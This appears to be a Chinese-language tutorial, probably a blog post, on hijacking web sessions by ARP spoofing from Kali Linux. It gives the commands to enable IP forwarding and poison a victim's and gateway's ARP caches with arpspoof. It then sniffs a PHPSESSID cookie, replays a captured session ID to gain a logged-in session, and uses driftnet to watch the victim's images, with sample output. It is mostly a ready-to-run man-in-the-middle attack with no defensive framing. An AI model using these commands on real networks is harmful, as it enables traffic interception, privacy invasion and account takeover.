利用arpspoof进行cookie会话劫持
1.开启IP转发
root@kali-PC:~# echo 1 > /proc/sys/net/ipv4/ip_forward
2.基本信息
A:本机信息
192.168.1.104
B:.靶机
192.168.1.108
C:网关
root@kali-PC:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
192.168.1.0 * 255.255.255.0 U 0 0 0 wlan0
2.ARP毒化,向攻击机声称自己(攻击者)就是网关
root@kali-PC:~# arpspoof -i wlan0 -t 192.168.1.108 192.168.1.1
3.ARP毒化,向网关声称自己(攻击者)就是网关
root@kali-PC:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.108
4.wireshark抓包
图中PHPSESSID的值是我们后续要用的
5.劫持会话
打开相应网站,把PHPSESSID的值设置为19b924ccbdda14b0da297664904e9129,然后刷新网页,此时可看到已经是登录后状态了
6.延伸:监控靶机上打开的图片
root@kali-PC:~# driftnet -i wlan0 -b -v
driftnet: using temporary file directory /tmp/drifnet-YHw0gx
driftnet: listening on wlan0 in promiscuous mode
driftnet: using filter expression `tcp'
driftnet: started display child, pid 4442
driftnet: link-level header length is 14 bytes
.driftnet: new connection: 61.155.222.133:80 -> 192.168.1.108:47590
..driftnet: new connection: 192.168.1.108:47590 -> 61.155.222.133:80
..........driftnet: new connection: 192.168.1.104:60461 -> 61.155.222.133:80
..driftnet: new connection: 61.155.222.133:80 -> 192.168.1.104:60461
............driftnet: new connection: 192.168.1.108:39835 -> 216.58.221.142:443
..........driftnet: new connection: 192.168.1.108:39836 -> 216.58.221.142:443
......................................................................driftnet: new connection: 192.168.1.108:39835 -> 216.58.221.142:443
..........driftnet: new connection: 192.168.1.108:39836 -> 216.58.221.142:443
......